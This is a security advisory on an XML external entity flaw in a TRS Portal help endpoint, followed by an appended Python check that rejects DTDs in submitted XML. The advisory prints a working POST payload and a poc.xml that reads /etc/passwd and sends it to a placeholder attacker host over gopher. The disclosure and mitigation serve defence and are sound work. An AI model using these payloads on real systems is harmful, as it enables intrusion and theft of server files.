TRS Portal personalized portal arbitrary file read (part 2)

2015-11-20T00:00:00
ID SSV:94701
Type seebug
Reporter Root
Modified 2015-11-20T00:00:00

Description

Brief description:

An external entity injection vulnerability was found in a link of the Portal personalized portal.

Details:

The TRS Portal personalized portal link http://XX.XX.XX.XX/portal/help/wcmhelp_addedit_dowith.jsp does not filter external entities in the submitted XML. External entities are resolved during parsing, so any file on the server can be read.

Proof of vulnerability:

Exploitation process: http://XX.XX.XX.XX/portal/help/wcmhelp_addedit_dowith.jsp, POST request: ObjectXML=<%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f><!DOCTYPE%20root%20%5B%0d%0a%20%20<!ENTITY%20%25%20remote%20SYSTEM%20%22http://远程公网ip地址/poc.xml%22>%0d%0a%20%20%25remote;%0d%0a%5D>%0d%0a</root>

[Screenshot 11111.png: https://images.seebug.org/upload/201511/201815043d1b0455fcabfe69f53edaf837197de3.png]

poc.xml reads the passwd file on the target machine and writes it into the web server log: <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'gopher://远程公网ip地址:80/1%payload;'>">%int; %trick; The passwd file we obtained from our remote server log:

[Screenshot 22222.png: https://images.seebug.org/upload/201511/2018162420cfff03da7adbad3fd4ab3799ab0581.png]
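As an added example (not part of this advisory or of TRS Portal's code), the check below shows the mitigation that closes this bug at the parser: refuse any DOCTYPE or entity declaration before the ObjectXML document is parsed, so no external entity can be declared, let alone resolved. It is written in Python with the standard expat bindings; the sample request body is the advisory's own with the attacker host replaced by the placeholder attacker.invalid, and the function names and classification strings are assumptions.

```python
import xml.parsers.expat as expat
from urllib.parse import unquote_plus

class DoctypeForbidden(ValueError):
    """Raised when a submitted document declares a DTD or any entity."""

def parse_without_dtd(xml_text: str) -> dict:
    """Parse with expat but refuse any DOCTYPE or entity declaration: that
    stops the external-entity resolution this advisory abuses at the source."""
    parser = expat.ParserCreate()
    summary = {"root": None, "elements": 0}
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")
    def on_start(name, attrs):
        summary["root"] = summary["root"] or name
        summary["elements"] += 1
    parser.StartDoctypeDeclHandler = on_doctype          # fires before any entity
    parser.EntityDeclHandler = lambda *_: on_doctype("entity", None, None, 0)
    parser.StartElementHandler = on_start
    parser.Parse(xml_text.encode("utf-8"), True)         # raises from the handler
    return summary

def form_fields(body: str) -> dict:
    """Decode a form-urlencoded body, splitting on '&' only (never on ';',
    which the payload's parameter-entity reference '%remote;' contains)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields

def screen_request(body: str) -> str:
    """Classify a POST body for wcmhelp_addedit_dowith.jsp before it is parsed."""
    xml_text = form_fields(body).get("ObjectXML")
    if xml_text is None:
        return "missing"
    try:
        parse_without_dtd(xml_text)
    except DoctypeForbidden:
        return "dtd-rejected"
    except expat.ExpatError:
        return "malformed"
    return "ok"

# Constructed samples: the advisory's request (attacker host replaced by the
# reserved name attacker.invalid) and an ordinary help object with no DTD.
MALICIOUS_BODY = ("ObjectXML=<%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f><!DOCTYPE"
                  "%20root%20%5B%0d%0a%20%20<!ENTITY%20%25%20remote%20SYSTEM%20%22http://attacker"
                  ".invalid/poc.xml%22>%0d%0a%20%20%25remote;%0d%0a%5D>%0d%0a</root>")
BENIGN_BODY = "ObjectXML=%3Croot%3E%3Chelp%3E%3Ctitle%3EHi%3C/title%3E%3C/help%3E%3C/root%3E"
```

Rejecting the DTD outright is stricter than only disabling external entities, but it is the setting that leaves no entity-expansion surface at all, which is the right default for an endpoint that receives XML from clients.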